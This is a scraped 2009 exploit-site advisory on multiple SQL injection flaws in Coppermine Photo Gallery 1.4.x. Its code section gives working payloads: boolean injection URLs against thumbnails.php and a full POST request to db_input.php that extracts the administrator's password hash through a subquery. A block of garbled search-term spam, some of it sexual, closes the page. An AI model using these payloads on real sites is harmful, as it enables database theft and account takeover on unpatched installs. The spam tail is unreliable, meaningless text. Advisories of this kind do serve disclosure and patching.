exploits , vulnerabilities , articles , Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities
| Title |
Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities |
| Published |
2009-05-18-12:00AM |
| Updated |
2009-05-19-10:30PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
girex |
| Vulnerable |
Coppermine Photo Gallery 1.4.22 Coppermine Photo Gallery 1.4.21 Coppermine Photo Gallery 1.4.20 Coppermine Photo Gallery 1.4.18 Coppermine Photo Gallery 1.4.17 Coppermine Photo Gallery 1.4.16 Coppermine Photo Gallery 1.4.15 Coppermine Photo Gallery 1.4.14 Coppermine Photo Gallery 1.4.13 Coppermine Photo Gallery 1.4.12 Coppermine Photo Gallery 1.4.11 Coppermine Photo Gallery 1.4.10 Coppermine Photo Gallery 1.4.9 Coppermine Photo Gallery 1.4.4 Coppermine Photo Gallery 1.4.3 Coppermine Photo Gallery 1.4.2 Coppermine Photo Gallery 1.4
|
| Not Vulnerable |
|
| Code |
Attackers can use a browser to exploit these issues.The following example data, URIs and exploit are available:http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23 true http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23 falsePOST /[path]/db_input.php HTTP/1.1 Host: [host] Keep-Alive: 300 Connection: keep-alive Cookie: [your_cookies] Content-Type: application/x-www-form-urlencodedevent=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23http://www.example.com/[path]/displayecard.php?data=[$injection] HTTP/1.1 /data/vulnerabilities/exploits/35009.pl |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Wed, 25 Nov 2009 14:21:40 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www .asian 200 /compo www.htshui www.dslrdv nude pic a indian mas baike.baid baike.baid okij shoutcast Www.Wwesex www.tkyxgl 200 /compo tamilbluef Friendster juqu8.com iipibiloli 200 /compo fc1 WWW.DOGFUC W.trishavi news+for+c asp login Www.sexy.v 2.4.20-6 www.sublim PHP Remote blueflime remot%252B Rally v news for c les videos Seks india Videosexyg www.47cb.c hbzkb.net www.csfwjs rsh Saniamirza www.2008sf Videosex a esrv u ww.89.cm// apw www.pybmw. news+for+c CVE-2006-3 4327654565 freeonline Www sexvid
|